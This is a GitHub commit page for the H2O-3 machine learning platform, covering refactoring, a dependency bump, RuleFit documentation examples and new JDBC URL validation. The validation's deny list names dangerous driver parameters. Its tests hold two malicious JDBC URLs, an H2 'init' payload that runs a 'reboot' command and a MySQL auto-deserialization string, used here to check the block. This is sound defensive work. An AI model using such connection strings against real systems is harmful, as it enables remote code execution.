Skip to content

Commit

Permalink
Merge remote-tracking branch 'origin/rel-3.46.0' into gh-15810
Browse files Browse the repository at this point in the history
  • Loading branch information
krasinski committed Oct 29, 2024
2 parents 2cb3105 + ac1d642 commit e919ad3
Show file tree
Hide file tree
Showing 40 changed files with 1,145 additions and 388 deletions.
25 changes: 14 additions & 11 deletions h2o-algos/src/main/java/water/tools/MojoConvertTool.java
Original file line number Diff line number Diff line change
Expand Up @@ -33,25 +33,28 @@ void convert() throws IOException {
Files.write(pojoPath, pojo.getBytes(StandardCharsets.UTF_8));
}

private static void usage() {
System.err.println("java -cp h2o.jar " + MojoConvertTool.class.getName() + " source_mojo.zip target_pojo.java");
}

public static void main(String[] args) throws IOException {
if (args.length < 2) {
usage();
try {
mainInternal(args);
}
catch (IllegalArgumentException e) {
System.err.println(e.getMessage());
System.exit(1);
}
}

public static void mainInternal(String[] args) throws IOException {
if (args.length < 2 || args[0] == null || args[1] == null) {
throw new IllegalArgumentException("java -cp h2o.jar " + MojoConvertTool.class.getName() + " source_mojo.zip target_pojo.java");
}

File mojoFile = new File(args[0]);
if (!mojoFile.isFile()) {
System.err.println("Specified MOJO file (" + mojoFile.getAbsolutePath() + ") doesn't exist!");
System.exit(2);
if (!mojoFile.exists() || !mojoFile.isFile()) {
throw new IllegalArgumentException("Specified MOJO file (" + mojoFile.getAbsolutePath() + ") doesn't exist!");
}
File pojoFile = new File(args[1]);
if (pojoFile.isDirectory() || (pojoFile.getParentFile() != null && !pojoFile.getParentFile().isDirectory())) {
System.err.println("Invalid target POJO file (" + pojoFile.getAbsolutePath() + ")! Please specify a file in an existing directory.");
System.exit(3);
throw new IllegalArgumentException("Invalid target POJO file (" + pojoFile.getAbsolutePath() + ")! Please specify a file in an existing directory.");
}

System.out.println();
Expand Down
2 changes: 1 addition & 1 deletion h2o-assemblies/main/build.gradle
Original file line number Diff line number Diff line change
Expand Up @@ -52,7 +52,7 @@ dependencies {

// Upgrade dependencies coming from Hadoop to address vulnerabilities
api "org.apache.commons:commons-compress:1.26.0"
api "com.google.protobuf:protobuf-java:3.21.7"
api "com.google.protobuf:protobuf-java:3.25.5"

constraints {
api('com.fasterxml.jackson.core:jackson-databind:2.17.2') {
Expand Down
158 changes: 157 additions & 1 deletion h2o-bindings/bin/custom/python/gen_rulefit.py
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,21 @@ def rule_importance(self):
Retrieve rule importances for a Rulefit model
:return: H2OTwoDimTable
:examples:
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> rule_importance = rfit.rule_importance()
>>> print(rfit.rule_importance())
"""
if self._model_json["algo"] != "rulefit":
raise H2OValueError("This function is available for Rulefit models only")
Expand All @@ -18,11 +33,29 @@ def rule_importance(self):

def predict_rules(self, frame, rule_ids):
"""
Evaluates validity of the given rules on the given data.
Evaluates validity of the given rules on the given data.
:param frame: H2OFrame on which rule validity is to be evaluated
:param rule_ids: string array of rule ids to be evaluated against the frame
:return: H2OFrame with a column per each input ruleId, representing a flag whether given rule is applied to the observation or not.
:examples:
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/iris/iris_train.csv"
>>> df = h2o.import_file(path=f, col_types={'species': "enum"})
>>> x = df.columns
>>> y = "species"
>>> x.remove(y)
>>> train, test = df.split_frame(ratios=[.8], seed=1234)
>>> rfit = H2ORuleFitEstimator(min_rule_length=4,
... max_rule_length=5,
... max_num_rules=3,
... seed=1234,
... model_type="rules")
>>> rfit.train(training_frame=train, x=x, y=y, validation_frame=test)
>>> print(rfit.predict_rules(train, ['M0T38N5_Iris-virginica']))
"""
from h2o.frame import H2OFrame
from h2o.utils.typechecks import assert_is_type
Expand Down Expand Up @@ -52,3 +85,126 @@ def predict_rules(self, frame, rule_ids):
"""
),
)

examples = dict(
algorithm="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... algorithm="gbm",
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
max_categorical_levels="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... max_categorical_levels=11,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
max_num_rules="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=3,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
min_rule_length="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... min_rule_length=4,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
max_rule_length="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... min_rule_length=3,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
model_type="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... model_type="rules",
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
distribution="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... distribution="bernoulli",
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
rule_generation_ntrees="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... rule_generation_ntrees=60,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
"""
)
45 changes: 45 additions & 0 deletions h2o-core/src/main/java/water/jdbc/SQLManager.java
Original file line number Diff line number Diff line change
Expand Up @@ -5,10 +5,20 @@
import water.parser.ParseDataset;
import water.util.Log;

import java.io.UnsupportedEncodingException;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URLDecoder;
import java.sql.*;
import java.util.Arrays;
import java.util.List;
import java.util.Objects;
import java.util.concurrent.ArrayBlockingQueue;
import java.util.concurrent.atomic.AtomicLong;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import java.util.stream.Stream;

public class SQLManager {

Expand All @@ -30,6 +40,15 @@ public class SQLManager {

private static final String TMP_TABLE_ENABLED = H2O.OptArgs.SYSTEM_PROP_PREFIX + "sql.tmp_table.enabled";

private static final String DISALLOWED_JDBC_PARAMETERS_PARAM = H2O.OptArgs.SYSTEM_PROP_PREFIX + "sql.jdbc.disallowed.parameters";

private static final Pattern JDBC_PARAMETERS_REGEX_PATTERN = Pattern.compile("(?i)[?;&]([a-z]+)=");

private static final List<String> DEFAULT_JDBC_DISALLOWED_PARAMETERS = Stream.of(
"autoDeserialize", "queryInterceptors", "allowLoadLocalInfile", "allowMultiQueries", //mysql
"allowLoadLocalInfileInPath", "allowUrlInLocalInfile", "allowPublicKeyRetrieval", //mysql
"init", "script", "shutdown" //h2
).map(String::toLowerCase).collect(Collectors.toList());
private static AtomicLong NEXT_TABLE_NUM = new AtomicLong(0);

static Key<Frame> nextTableKey(String prefix, String postfix) {
Expand Down Expand Up @@ -58,6 +77,7 @@ public static Job<Frame> importSqlTable(
final String username, final String password, final String columns,
final Boolean useTempTable, final String tempTableName,
final SqlFetchMode fetchMode, final Integer numChunksHint) {
validateJdbcUrl(connection_url);

final Key<Frame> destination_key = nextTableKey(table, "sql_to_hex");
final Job<Frame> j = new Job<>(destination_key, Frame.class.getName(), "Import SQL Table");
Expand Down Expand Up @@ -533,6 +553,7 @@ private static int estimateConcurrentConnections(final int cloudSize, final shor
* @throws SQLException if a database access error occurs or the url is
*/
public static Connection getConnectionSafe(String url, String username, String password) throws SQLException {
validateJdbcUrl(url);
initializeDatabaseDriver(getDatabaseType(url));
try {
return DriverManager.getConnection(url, username, password);
Expand Down Expand Up @@ -588,6 +609,30 @@ static void initializeDatabaseDriver(String databaseType) {
}
}

public static void validateJdbcUrl(String jdbcUrl) throws IllegalArgumentException {
if (jdbcUrl == null || jdbcUrl.trim().isEmpty()) {
throw new IllegalArgumentException("JDBC URL is null or empty");
}

if (!jdbcUrl.toLowerCase().startsWith("jdbc:")) {
throw new IllegalArgumentException("JDBC URL must start with 'jdbc:'");
}

Matcher matcher = JDBC_PARAMETERS_REGEX_PATTERN.matcher(jdbcUrl);
String property = System.getProperty(DISALLOWED_JDBC_PARAMETERS_PARAM);
List<String> disallowedParameters = property == null ?
DEFAULT_JDBC_DISALLOWED_PARAMETERS :
Arrays.stream(property.split(",")).map(String::toLowerCase).collect(Collectors.toList());

while (matcher.find()) {
String key = matcher.group(1);
if (disallowedParameters.contains(key.toLowerCase())) {
throw new IllegalArgumentException("Potentially dangerous JDBC parameter found: " + key +
". That behavior can be altered by setting " + DISALLOWED_JDBC_PARAMETERS_PARAM + " env variable to another comma separated list.");
}
}
}

static class SqlTableToH2OFrameStreaming {
final String _table, _columns, _databaseType;
final int _numCol;
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -33,10 +33,12 @@ public ValStr apply(Env env, Env.StackHelp stk, AstRoot[] asts) {
try {
// only allow to run approved tools (from our package), not just anything on classpath
Class<?> clazz = Class.forName(TOOLS_PACKAGE + toolClassName);
Method mainMethod = clazz.getDeclaredMethod("main", String[].class);
Method mainMethod = clazz.getDeclaredMethod("mainInternal", String[].class);
mainMethod.invoke(null, new Object[]{args});
} catch (Exception e) {
throw new RuntimeException(e);
RuntimeException shorterException = new RuntimeException(e.getCause().getMessage());
shorterException.setStackTrace(new StackTraceElement[0]);
throw shorterException;
}
return new ValStr("OK");
}
Expand Down
3 changes: 3 additions & 0 deletions h2o-core/src/main/java/water/tools/EncryptionTool.java
Original file line number Diff line number Diff line change
Expand Up @@ -47,6 +47,9 @@ public void encrypt(File input, File output) throws IOException, GeneralSecurity
}

public static void main(String[] args) throws GeneralSecurityException, IOException {
mainInternal(args);
}
public static void mainInternal(String[] args) throws GeneralSecurityException, IOException {
EncryptionTool et = new EncryptionTool();
et._keystore_file = new File(args[0]);
et._keystore_type = args[1];
Expand Down
12 changes: 10 additions & 2 deletions h2o-core/src/main/java/water/util/Log.java
Original file line number Diff line number Diff line change
Expand Up @@ -29,8 +29,8 @@ abstract public class Log {
public static final byte INFO = 3;
public static final byte DEBUG= 4;
public static final byte TRACE= 5;

public static final String[] LVLS = { "FATAL", "ERRR", "WARN", "INFO", "DEBUG", "TRACE" };
private static final String PROP_MAX_PID_LENGTH = H2O.OptArgs.SYSTEM_PROP_PREFIX + "log.max.pid.length";

private static int _level = INFO;
private static boolean _quiet = false;
Expand Down Expand Up @@ -262,7 +262,15 @@ public static String getLogFilePath(String level) {

private static String getHostPortPid() {
String host = H2O.SELF_ADDRESS.getHostAddress();
return fixedLength(host + ":" + H2O.API_PORT + " ", 22) + fixedLength(H2O.PID + " ", 6);
return fixedLength(host + ":" + H2O.API_PORT + " ", 22) + fixedLength(H2O.PID + " ", maximumPidLength() + 2);
}

// set sys.ai.h2o.log.max.pid.length to avoid h2o-3 trimming PID in the logs
private static int maximumPidLength() {
String maxPidPropertyValue = System.getProperty(PROP_MAX_PID_LENGTH);
return maxPidPropertyValue != null
? Integer.parseInt(maxPidPropertyValue)
: 4;
}

private static synchronized Logger createLog4j() {
Expand Down
20 changes: 20 additions & 0 deletions h2o-core/src/test/java/water/jdbc/SQLManagerTest.java
Original file line number Diff line number Diff line change
Expand Up @@ -145,4 +145,24 @@ public void testBuildSelectChunkSql() {
Assert.assertEquals("SELECT * FROM mytable LIMIT 1310 OFFSET 0",
SQLManager.buildSelectChunkSql("", "mytable", 0, 1310, "*", null));
}

@Test
public void testValidateJdbcConnectionStringH2() {
exception.expect(IllegalArgumentException.class);
exception.expectMessage("Potentially dangerous JDBC parameter found: init");

String h2MaliciousJdbc = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS RBT AS '@groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec(\"reboot\")" + "})" + "def rbt" + "'";

SQLManager.validateJdbcUrl(h2MaliciousJdbc);
}

@Test
public void testValidateJdbcConnectionStringMysql() {
exception.expect(IllegalArgumentException.class);
exception.expectMessage("Potentially dangerous JDBC parameter found: autoDeserialize");

String mysqlMaliciousJdbc = "jdbc:mysql://domain:123/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=abcd";

SQLManager.validateJdbcUrl(mysqlMaliciousJdbc);
}
}
Loading

0 comments on commit e919ad3

Please sign in to comment.